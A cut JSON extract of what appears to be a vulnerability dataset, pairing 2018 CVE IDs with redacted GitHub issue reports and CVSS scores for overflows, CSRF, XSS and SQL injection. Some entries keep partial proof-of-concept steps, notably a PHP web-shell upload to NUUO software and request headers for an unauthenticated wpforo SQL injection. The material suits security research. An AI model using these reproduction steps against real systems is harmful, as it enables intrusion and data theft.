        "exploitabilityScore": 2.1
    },
    {
        "CVE_ID": "CVE-2018-11475",
        "Issue_Url_old": "https://github.com/monstra-cms/monstra/issues/443",
        "Issue_Url_new": "https://github.com/monstra-cms/monstra/issues/443",
        "Repo_new": "monstra-cms/monstra",
        "Issue_Created_At": "2018-05-22T19:37:16Z",
        "description": "Session Management in users. Session Management Issue in Users tab link: URLTAG You need two browsers for exploitation NUMBERTAG Go to users settings in both the browsers NUMBERTAG update your password in one browser and click on save APITAG move to other browser and try to add some information like name and all. i.e it is not asking for reauthentication after password change.. The other browser doesnt log you out because of password APITAG an attacker can edit any information... If an attacker had already logged in once..No matter how many times the victim changes his password, the attacker would be able to access the victim's account. Refer to owasp for session management",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.0,
        "impactScore": 5.9,
        "exploitabilityScore": 2.1
    },
    {
        "CVE_ID": "CVE-2018-11487",
        "Issue_Url_old": "https://github.com/gaozhifeng/PHPMyWind/issues/2",
        "Issue_Url_new": "https://github.com/gaozhifeng/phpmywind/issues/2",
        "Repo_new": "gaozhifeng/phpmywind",
        "Issue_Created_At": "2018-05-25T07:53:39Z",
        "description": "page.php maybe has some vul. When I visit the next three url, the source code of the page will be injected my code at the location of page number area. URLTAG APITAG FILETAG APITAG FILETAG APITAG Then, you can use browser check the source code cf the page, you will find the payload code in the code where is page number area. The vul coursed by the \"$nowurl\" in APITAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-11490",
        "Issue_Url_old": "https://github.com/pts/sam2p/issues/38",
        "Issue_Url_new": "https://github.com/pts/sam2p/issues/38",
        "Repo_new": "pts/sam2p",
        "Issue_Created_At": "2018-05-24T02:27:21Z",
        "description": "Heap Buffer Overflow NUMBERTAG in function APITAG in cgif.c. Here is the bug NUMBERTAG if APITAG != NO_SUCH_CODE NUMBERTAG APITAG APITAG NUMBERTAG APITAG the APITAG APITAG NUMBERTAG should be checked if it is less than LZ_MAX_CODE. The crash is as follows: (gdb) run crash NUMBERTAG FILETAG Program received signal SIGSEGV, Segmentation fault NUMBERTAG aa in APITAG APITAG \"\", APITAG APITAG at APITAG NUMBERTAG APITAG APITAG NUMBERTAG APITAG (gdb) bt NUMBERTAG aa in APITAG APITAG \"\", APITAG APITAG at APITAG NUMBERTAG eb in APITAG APITAG Line=<optimized out>, APITAG out>) at APITAG NUMBERTAG ba in APITAG APITAG at APITAG NUMBERTAG d in in_gif_reader (ufd=<optimized out>) at APITAG NUMBERTAG fca8 in Image::load (ufd NUMBERTAG a NUMBERTAG APITAG format=format APITAG at APITAG NUMBERTAG eb0 in run_sam2p_engine (sout=..., serr=..., arg NUMBERTAG optimized out>, helpp=helpp APITAG at APITAG NUMBERTAG d0 in main (arg NUMBERTAG fffffffe5c8) at APITAG (gdb) p Private APITAG NUMBERTAG gdb)",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-11493",
        "Issue_Url_old": "https://github.com/wuzhicms/wuzhicms/issues/137",
        "Issue_Url_new": "https://github.com/wuzhicms/wuzhicms/issues/137",
        "Repo_new": "wuzhicms/wuzhicms",
        "Issue_Created_At": "2018-05-23T09:26:58Z",
        "description": "There is a CSRF vulnerability that can add links to friendship. After the administrator logs in, open this page poc FILETAG APITAG a friendship link ERRORTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-11496",
        "Issue_Url_old": "https://github.com/ckolivas/lrzip/issues/96",
        "Issue_Url_new": "https://github.com/ckolivas/lrzip/issues/96",
        "Repo_new": "ckolivas/lrzip",
        "Issue_Created_At": "2018-05-25T01:57:28Z",
        "description": "heap use after free in read_stream APITAG In the latest commit master ed NUMBERTAG e1 URLTAG , there is a heap use after free in read_stream function APITAG With ASAN cflags \" fsanitize=address\", use the POC attached will trigger the vulnerability. Command to reproduce: APITAG The ASAN backtrace info: ERRORTAG when compile without ASAN flags, lrzip will crash because of double free ERRORTAG APITAG was freed in APITAG in APITAG CODETAG in the below code, the APITAG may be freed in APITAG , but with while the s >buf will be used again in memcpy in line NUMBERTAG and may be free again in fill_buffer in NUMBERTAG which caused heap use after free and double free. ERRORTAG FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-11498",
        "Issue_Url_old": "https://github.com/inikep/lizard/issues/16",
        "Issue_Url_new": "https://github.com/inikep/lizard/issues/16",
        "Repo_new": "inikep/lizard",
        "Issue_Created_At": "2018-05-03T02:10:03Z",
        "description": "Negative size passed to memcpy resulting in memory corruption APITAG Hey there, I have come across a vulnerability in the lizard decompressor, whereby a negative size integer is passed to APITAG . This occurs in APITAG URLTAG . APITAG Since APITAG takes the length and treats it as a APITAG , this results in an excessive copy from APITAG into op . APITAG This was found while fuzzing commit APITAG (current latest as of this date). By controlling the number of bytes passed as length , this results in memory corruption which leads to execution control. Find the POC file here: FILETAG . As follows is the ASAN output: ERRORTAG",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2018-11500",
        "Issue_Url_old": "https://github.com/sanluan/PublicCMS/issues/11",
        "Issue_Url_new": "https://github.com/sanluan/publiccms/issues/11",
        "Repo_new": "sanluan/publiccms",
        "Issue_Created_At": "2018-05-25T04:04:42Z",
        "description": "There is a CSRF vulnerability that can add the administrator account. The Add administrator Function is not check referer and token POC: ERRORTAG Building a page and inducing administrator access can add a user with super privileges.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-11507",
        "Issue_Url_old": "https://github.com/FLIF-hub/FLIF/issues/509",
        "Issue_Url_new": "https://github.com/flif-hub/flif/issues/509",
        "Repo_new": "flif-hub/flif",
        "Issue_Created_At": "2018-05-27T17:18:15Z",
        "description": "CVETAG resource exhaustion. FLIF uses huge amount of CPU and memory in function image_load_pnm at image/image APITAG when processing following file: FILETAG FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-11515",
        "Issue_Url_old": "https://github.com/DediData/wpforo/issues/1",
        "Issue_Url_new": "https://github.com/dedidata/wpforo/issues/1",
        "Repo_new": "DediData/wpforo",
        "Issue_Created_At": "2018-05-27T12:40:35Z",
        "description": "Sql injection directly get the administrator account and password. No login APITAG is sql injection on the search\u3002 poc: APITAG APITAG posts HTTP NUMBERTAG Host: gvectors.com User Agent: Mozilla NUMBERTAG APITAG NT NUMBERTAG WOW NUMBERTAG r NUMBERTAG Gecko NUMBERTAG Firefo NUMBERTAG Accept: PATHTAG / ;q NUMBERTAG Accept Language: zh CN,zh; APITAG TW; APITAG HK; APITAG US; APITAG Accept Encoding: gzip, deflate Referer: URLTAG Cookie: APITAG APITAG APITAG _gat NUMBERTAG Connection: close Upgrade Insecure Requests NUMBERTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-11522",
        "Issue_Url_old": "https://github.com/IceEnd/Yosoro/issues/11",
        "Issue_Url_new": "https://github.com/iceend/yosoro/issues/11",
        "Repo_new": "iceend/yosoro",
        "Issue_Created_At": "2018-05-17T11:37:23Z",
        "description": "FILETAG Expected behavior This cross site scripting vulnerability allows an attacker to execute arbitrary code on the victims machine by creating a malicious note. In the worst case this will lead to a reverse shell. I am not going to paste the code for the reverse shell here for obvious reasons.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-11523",
        "Issue_Url_old": "https://github.com/unh3x/just4cve/issues/1",
        "Issue_Url_new": "https://github.com/unh3x/just4cve/issues/1",
        "Repo_new": "unh3x/just4cve",
        "Issue_Created_At": "2018-05-28T12:37:21Z",
        "description": "NUUO APITAG / APITAG Arbitrary File Upload Vulnerability. NUUO APITAG / APITAG Arbitrary File Upload Vulnerability ========================== Advisory: NUUO APITAG / APITAG Arbitrary File Upload Vulnerability Author: M3 MENTIONTAG From APITAG Affected Version: All ========================== Vulnerability Description ========================== Recetly, I found an Arbitrary File Upload Vulnerability in 'NUUO APITAG program, APITAG is widely used all over the world. Vulnerable cgi: FILETAG APITAG As the code above, no any filter, so we can upload a php shell directly to the web server. ========================== POC && EXP NUMBERTAG Upload APITAG to web root path: POST FILETAG HTTP NUMBERTAG Host: APITAG Accept Encoding: gzip, deflate Accept: / Accept Language: en User Agent: Mozilla NUMBERTAG compatible; MSIE NUMBERTAG Windows NT NUMBERTAG Win NUMBERTAG Trident NUMBERTAG Connection: close Content Type: multipart/form data; boundary NUMBERTAG Content Length NUMBERTAG Content Disposition: form data; name=\"userfile\"; APITAG APITAG NUMBERTAG Check if the php file is uploaded successfully: GET FILETAG If the page returns phpinfo info, target is vulnerable! Just enjoy it!",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-11528",
        "Issue_Url_old": "https://github.com/wuzhicms/wuzhicms/issues/138",
        "Issue_Url_new": "https://github.com/wuzhicms/wuzhicms/issues/138",
        "Repo_new": "wuzhicms/wuzhicms",
        "Issue_Created_At": "2018-05-28T05:41:32Z",
        "description": "\u4e94\u6307CMS NUMBERTAG SQL\u6ce8\u5165. \u6f0f\u6d1ePOC\uff1a APITAG APITAG PATHTAG APITAG NUMBERTAG require PATHTAG require APITAG if(!isset($GLOBALS['param'])) { APITAG } elseif($GLOBALS['param']=='') { APITAG } $code = APITAG $posttime = SYS_TIME NUMBERTAG db = load_class('db'); $r = $db >get_one('sms_checkcode',\" code ='$code' AND posttime >$posttime NUMBERTAG id DESC'); if($r) { APITAG } else { APITAG } APITAG \u5b98\u7f51\u5df2\u7ecf\u590d\u73b0\u6210\u529f.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-11536",
        "Issue_Url_old": "https://github.com/mity/md4c/issues/36",
        "Issue_Url_new": "https://github.com/mity/md4c/issues/36",
        "Repo_new": "mity/md4c",
        "Issue_Created_At": "2018-05-28T16:35:09Z",
        "description": "Multiple vulnerabilities in md4c. Multiple vulnerabilities in md4c There are multiple vulnerabilities in md4c (git repository: URLTAG Latest commit NUMBERTAG e2a5c on Apr NUMBERTAG git log commit APITAG Author: Martin Mitas < EMAILTAG rg> Date: Thu Apr NUMBERTAG Heap buffer overflow in APITAG command: ./md2html testfile testcase: URLTAG It seems like that an overflow happened in APITAG in APITAG memcpy(dummy, mark, sizeof(MD_MARK)); APITAG provided information as below NUMBERTAG ERROR: APITAG heap buffer overflow on address NUMBERTAG a NUMBERTAG at pc NUMBERTAG dd7f5 bp NUMBERTAG ffedcfedc NUMBERTAG sp NUMBERTAG ffedcfed3e0 WRITE of size NUMBERTAG at NUMBERTAG a NUMBERTAG thread T NUMBERTAG dd7f4 in __asan_memcpy PATHTAG NUMBERTAG dd3 in md_split_simple_pairing_mark PATHTAG NUMBERTAG dd3 in APITAG PATHTAG NUMBERTAG in md_analyze_marks PATHTAG NUMBERTAG c9c8 in md_analyze_link_contents PATHTAG NUMBERTAG c9c8 in md_analyze_inlines PATHTAG NUMBERTAG b NUMBERTAG in APITAG PATHTAG NUMBERTAG e7f7 in md_process_leaf_block PATHTAG NUMBERTAG e7f7 in md_process_all_blocks PATHTAG NUMBERTAG e7f7 in md_process_doc PATHTAG NUMBERTAG cb in md_parse PATHTAG NUMBERTAG a7a8 in md_render_html PATHTAG NUMBERTAG cc in process_file PATHTAG NUMBERTAG cc in main PATHTAG NUMBERTAG f NUMBERTAG c6fc NUMBERTAG f in __libc_start_main PATHTAG NUMBERTAG a NUMBERTAG in _start ( PATHTAG ) Address NUMBERTAG a NUMBERTAG is a wild pointer. SUMMARY: APITAG heap buffer overflow PATHTAG in __asan_memcpy Shadow bytes around the buggy address NUMBERTAG c NUMBERTAG fff NUMBERTAG c NUMBERTAG fff NUMBERTAG c NUMBERTAG fff NUMBERTAG a NUMBERTAG c NUMBERTAG fff NUMBERTAG b0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG c0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG d0:[fa]fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG e0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG f0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents NUMBERTAG application bytes): Addressable NUMBERTAG Partially addressable NUMBERTAG Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb APITAG internal: fe Left alloca redzone: ca Right alloca redzone: cb NUMBERTAG ABORTING Heap buffer overflow in APITAG command: ./md2html testfile testcase: URLTAG It seems like that mark variable access a restricted area of memory in APITAG while(!(mark >flags & MD_MARK_RESOLVED) || mark >beg APITAG NUMBERTAG c3c7fff NUMBERTAG fa fa[fa]fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c3c7fff NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c3c7fff NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c3c7fff NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c3c7fff NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c3c7fff NUMBERTAG a0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents NUMBERTAG application bytes): Addressable NUMBERTAG Partially addressable NUMBERTAG Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb APITAG internal: fe Left alloca redzone: ca Right alloca redzone: cb NUMBERTAG ABORTING",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-11545",
        "Issue_Url_old": "https://github.com/mity/md4c/issues/39",
        "Issue_Url_new": "https://github.com/mity/md4c/issues/39",
        "Repo_new": "mity/md4c",
        "Issue_Created_At": "2018-05-29T15:41:50Z",
        "description": "Heap buffer overflow in APITAG command: ./md2html testfile testcase: URLTAG APITAG provided information as below: APITAG NUMBERTAG ERROR: APITAG heap buffer overflow on address NUMBERTAG b1 at pc NUMBERTAG ff NUMBERTAG bp NUMBERTAG fff NUMBERTAG be8d0 sp NUMBERTAG fff NUMBERTAG be8c8 WRITE of size NUMBERTAG at NUMBERTAG b1 thread T NUMBERTAG ff NUMBERTAG in md_merge_lines PATHTAG NUMBERTAG ff NUMBERTAG in md_merge_lines_alloc PATHTAG NUMBERTAG ff NUMBERTAG in APITAG PATHTAG NUMBERTAG in APITAG PATHTAG NUMBERTAG in APITAG PATHTAG NUMBERTAG in md_end_current_block PATHTAG NUMBERTAG c7f7 in md_process_doc PATHTAG NUMBERTAG cb in md_parse PATHTAG NUMBERTAG a7a8 in md_render_html PATHTAG NUMBERTAG cc in process_file PATHTAG NUMBERTAG cc in main PATHTAG NUMBERTAG fda NUMBERTAG a NUMBERTAG f in __libc_start_main PATHTAG NUMBERTAG a NUMBERTAG in _start ( PATHTAG NUMBERTAG b1 is located NUMBERTAG bytes to the right of NUMBERTAG byte region APITAG allocated by thread T0 here NUMBERTAG de NUMBERTAG in __interceptor_malloc PATHTAG NUMBERTAG e NUMBERTAG f in md_merge_lines_alloc PATHTAG NUMBERTAG e NUMBERTAG f in APITAG PATHTAG NUMBERTAG in APITAG PATHTAG NUMBERTAG in APITAG PATHTAG NUMBERTAG in md_end_current_block PATHTAG SUMMARY: APITAG heap buffer overflow PATHTAG in md_merge_lines Shadow bytes around the buggy address NUMBERTAG c NUMBERTAG fff7fc NUMBERTAG c NUMBERTAG fff7fd NUMBERTAG c NUMBERTAG fff7fe NUMBERTAG c NUMBERTAG fff7ff NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa fd fd fd fd fd fd fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa NUMBERTAG fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents NUMBERTAG application bytes): Addressable NUMBERTAG Partially addressable NUMBERTAG Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb APITAG internal: fe Left alloca redzone: ca Right alloca redzone: cb NUMBERTAG ABORTING",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-11546",
        "Issue_Url_old": "https://github.com/mity/md4c/issues/38",
        "Issue_Url_new": "https://github.com/mity/md4c/issues/38",
        "Repo_new": "mity/md4c",
        "Issue_Created_At": "2018-05-29T15:41:25Z",
        "description": "Heap buffer overflow in APITAG command: ./md2html testfile testcase: URLTAG APITAG provided information as below NUMBERTAG ERROR: APITAG heap buffer overflow on address NUMBERTAG f at pc NUMBERTAG c6 bp NUMBERTAG ffe NUMBERTAG e1b NUMBERTAG sp NUMBERTAG ffe NUMBERTAG e1b NUMBERTAG READ of size NUMBERTAG at NUMBERTAG f thread T NUMBERTAG c5 in md_is_named_entity_contents PATHTAG NUMBERTAG c5 in md_is_entity_str PATHTAG NUMBERTAG b NUMBERTAG in md_build_attribute PATHTAG NUMBERTAG f9 in md_enter_leave_span_a PATHTAG NUMBERTAG d2 in md_process_inlines PATHTAG NUMBERTAG d2 in APITAG PATHTAG NUMBERTAG e7f7 in md_process_leaf_block PATHTAG NUMBERTAG e7f7 in md_process_all_blocks PATHTAG NUMBERTAG e7f7 in md_process_doc PATHTAG NUMBERTAG cb in md_parse PATHTAG NUMBERTAG a7a8 in md_render_html PATHTAG NUMBERTAG cc in process_file PATHTAG NUMBERTAG cc in main PATHTAG NUMBERTAG fd6be7ec NUMBERTAG f in __libc_start_main PATHTAG NUMBERTAG a NUMBERTAG in _start ( PATHTAG NUMBERTAG f is located NUMBERTAG bytes to the right of NUMBERTAG byte region APITAG allocated by thread T0 here NUMBERTAG de NUMBERTAG in __interceptor_malloc PATHTAG NUMBERTAG bedb in md_merge_lines_alloc PATHTAG NUMBERTAG bedb in md_is_inline_link_spec_helper PATHTAG NUMBERTAG b9bf in md_is_inline_link_spec PATHTAG NUMBERTAG b9bf in md_resolve_links PATHTAG NUMBERTAG b9bf in md_analyze_inlines PATHTAG NUMBERTAG b NUMBERTAG in APITAG PATHTAG SUMMARY: APITAG heap buffer overflow PATHTAG in md_is_named_entity_contents Shadow bytes around the buggy address NUMBERTAG c NUMBERTAG fff7fb NUMBERTAG c NUMBERTAG fff7fc NUMBERTAG c NUMBERTAG fff7fd NUMBERTAG c NUMBERTAG fff7fe NUMBERTAG c NUMBERTAG fff7ff NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa NUMBERTAG fa fa NUMBERTAG fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents NUMBERTAG application bytes): Addressable NUMBERTAG Partially addressable NUMBERTAG Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb APITAG internal: fe Left alloca redzone: ca Right alloca redzone: cb NUMBERTAG ABORTING",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-11547",
        "Issue_Url_old": "https://github.com/mity/md4c/issues/37",
        "Issue_Url_new": "https://github.com/mity/md4c/issues/37",
        "Repo_new": "mity/md4c",
        "Issue_Created_At": "2018-05-29T15:40:53Z",
        "description": "Heap buffer overflow in APITAG command: ./md2html testfile testcase: URLTAG APITAG provided information as below: APITAG NUMBERTAG ERROR: APITAG heap buffer overflow on address NUMBERTAG at pc NUMBERTAG e1e4 bp NUMBERTAG ffdf NUMBERTAG ab NUMBERTAG sp NUMBERTAG ffdf NUMBERTAG ab NUMBERTAG READ of size NUMBERTAG at NUMBERTAG thread T NUMBERTAG e1e3 in APITAG PATHTAG NUMBERTAG d5 in APITAG PATHTAG NUMBERTAG d5 in APITAG PATHTAG NUMBERTAG d5 in md_end_current_block PATHTAG NUMBERTAG c7f7 in md_process_doc PATHTAG NUMBERTAG cb in md_parse PATHTAG NUMBERTAG a7a8 in md_render_html PATHTAG NUMBERTAG cc in process_file PATHTAG NUMBERTAG cc in main PATHTAG NUMBERTAG f NUMBERTAG c NUMBERTAG f in __libc_start_main PATHTAG NUMBERTAG a NUMBERTAG in _start ( PATHTAG NUMBERTAG is located NUMBERTAG bytes to the right of NUMBERTAG byte region APITAG allocated by thread T0 here NUMBERTAG ded NUMBERTAG in realloc PATHTAG NUMBERTAG b NUMBERTAG in md_push_block_bytes PATHTAG NUMBERTAG b NUMBERTAG in md_start_new_block PATHTAG NUMBERTAG b NUMBERTAG in md_process_line PATHTAG NUMBERTAG b NUMBERTAG in md_process_doc PATHTAG NUMBERTAG cb in md_parse PATHTAG NUMBERTAG a7a8 in md_render_html PATHTAG NUMBERTAG cc in process_file PATHTAG NUMBERTAG cc in main PATHTAG NUMBERTAG f NUMBERTAG c NUMBERTAG f in __libc_start_main PATHTAG SUMMARY: APITAG heap buffer overflow PATHTAG in APITAG Shadow bytes around the buggy address NUMBERTAG c2a7fff NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c2a7fff NUMBERTAG c2a7fff NUMBERTAG c2a7fff NUMBERTAG c2a7fff NUMBERTAG c2a7fff NUMBERTAG fa]fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c2a7fff NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c2a7fff NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c2a7fff NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c2a7fff NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c2a7fff NUMBERTAG a0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents NUMBERTAG application bytes): Addressable NUMBERTAG Partially addressable NUMBERTAG Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb APITAG internal: fe Left alloca redzone: ca Right alloca redzone: cb NUMBERTAG ABORTING",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-11548",
        "Issue_Url_old": "https://github.com/EOSIO/eos/issues/3497",
        "Issue_Url_new": "https://github.com/eosio/eos/issues/3497",
        "Repo_new": "eosio/eos",
        "Issue_Created_At": "2018-05-28T17:04:20Z",
        "description": "Limit P2P Connections from Same IP. To prevent DOS attacks against public endpoints we need to limit the number of connections from the same IP.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-11549",
        "Issue_Url_old": "https://github.com/wuzhicms/wuzhicms/issues/139",
        "Issue_Url_new": "https://github.com/wuzhicms/wuzhicms/issues/139",
        "Repo_new": "wuzhicms/wuzhicms",
        "Issue_Created_At": "2018-05-29T03:54:23Z",
        "description": "There is a a Stored XSS Vulnerabilities in Account Settings > Member Centre APITAG information > Ordinary member. Version: wuzhicms NUMBERTAG Steps to Reproduce NUMBERTAG register a account and Login the backstage URLTAG NUMBERTAG Go to Account Settings > Member Centre APITAG information > Ordinary member Fill in the QQ number FILETAG NUMBERTAG add the following payload to QQ Forms and click \u201csubmit\u201d APITAG APITAG FILETAG POST request data\uff1a _ CODETAG _ FILETAG APITAG Account Settings in Account Management to view FILETAG Stored XSS triggered ...",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2018-11555",
        "Issue_Url_old": "https://github.com/mm2/Little-CMS/issues/167",
        "Issue_Url_new": "https://github.com/mm2/little-cms/issues/167",
        "Repo_new": "mm2/little-cms",
        "Issue_Created_At": "2018-05-28T12:34:05Z",
